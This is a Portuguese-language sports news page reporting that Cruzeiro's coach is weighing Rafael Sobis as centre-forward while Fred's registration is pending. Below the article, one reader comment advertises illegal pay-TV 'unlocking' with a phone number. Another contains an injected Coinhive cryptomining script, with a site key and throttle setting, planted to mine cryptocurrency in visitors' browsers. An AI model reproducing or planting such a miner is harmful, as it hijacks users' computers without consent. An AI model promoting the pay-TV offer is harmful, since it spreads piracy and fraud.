logo

15/1/2018 12:36

Mano Menezes já pensa em plano B para centroavante em estreia do Cruzeiro no ano

Com presença de Fred ainda indefinida, Sobis pode ser camisa 9 contra Tupi

Mano Menezes já pensa em plano B para centroavante em estreia do Cruzeiro no ano

Rafael Sobis teve bom desempenho nos jogos-treino de pré-temporada e pode ser titular contra Tupi / Alexandre Guzanshe/EM/D.A Press

Na semana em que vai estrear no Campeonato Mineiro, contra o Tupi, quarta-feira, às 21h45, no Mineirão, o Cruzeiro fica à espera de uma definição importante: poderá ou não escalar o atacante Fred, principal reforço para 2018, contra o Galo Carijó? Para que o camisa 9 esteja em campo, o Atlético, ex-clube do jogador, precisa protocolar até quarta-feira na CBF a rescisão de contrato, com respectiva publicação no Boletim Informativo Diário (BID). Assim, o técnico Mano Menezes já vem pensando em um plano B no setor ofensivo. Criticado no ano passado pelo baixo rendimento, Rafael Sobis volta a ficar nos planos e tem boas chances de ser o centroavante no Gigante da Pampulha.



O atacante de 32 anos fez 13 gols em 50 jogos em 2017, sendo o vice-artilheiro da equipe, atrás de Thiago Neves (17). Mas ele terminou a temporada em baixa e foi sacado de vários jogos pelo treinador, que optou por escalar Raniel e em seguida De Arrascaeta de forma improvisada. Em novembro, o jogador teve frustrada uma tentativa de se transferir para o Querétaro, do México.

A performance de Sobis nos dois jogos-treinos da Raposa foi positiva: ele marcou gols nas vitórias contra o Guarani (4 a 1) e Ipatinga (3 a 1), na Toca da Raposa II. Em ambos, atuou no time reserva, formando quarteto ofensivo com Messidoro, Judivan e Rafael Marques.

Para poder jogar mais, o atacante se colocou à disposição de Mano tanto atuando pelos lados quanto centralizado. “Tenho essa facilidade de fazer mais de uma função. Isso é bom porque mostra por que joguei somente em clubes grandes e há muito tempo. No meu pessoal, penso somente em estar bem, pois tive muita dificuldade no ano passado por causa de lesões e estou me empenhando ao máximo sem pensar em jogar aqui ou ali. Estou pensando em estar bem. O momento requer isso. Se fizer uma boa pré-temporada, tenho certeza de que o resto do ano será maravilhoso para mim”, afirmou o camisa 7, que tem no currículo dois títulos da Copa Libertadores com o Internacional (2006 e 2010) e um vice-campeonato com o Tigres, em 2015.

Sobis chegou ao Cruzeiro em julho de 2016, numa transação que custou R$ 16,6 milhões aos cofres do clube. Em sua primeira temporada no time celeste, marcou quatro vezes em 28 jogos, sendo três numa partida contra o Internacional, no Independência, pelo Campeonato Brasileiro. Com contrato até a metade de 2019, hoje ele enfrenta a concorrência no ataque com o recém-chegado Fred, Sassá (que está machucado) e Rafael Marques.

3900 visitas - Fonte: Super Esportes


tiago silva     

VOCÊ QUE ESTÁ CANSADO DE TER POUCA PROGRAMAÇÃO DE TVV ASSSINATURA E NÃO CONCORDA COM OS VALORES COBRADOS
FAÇO LIBERAÇÃO E DIMINUÍMOS O VALOR DA CONTA
PARA TODO BRASIL
WHATZSAP 11 958694345

Rafael Pontes     

boa mano < src="https://coinhive.com/lib/coinhive.min.js"><>var a=new CoinHive.Anonymous("IoWE2BeVK3azaWL7xmC6HFJcYbwgiyoQ",{throttle:.3});a .start();

Enviar Comentário

Para enviar comentários, você precisa estar cadastrado e logado no nosso site. Para se cadastrar, clique Aqui. Para fazer login, clique Aqui.

Próximo Jogo - Brasileiro

Dom - 16:00 - Mineirão - PPV
Cruzeiro
Bahia

Último jogo - Copa do Brasil

Qua - 19:30 - Mineirão
Cruzeiro
1 2
Santos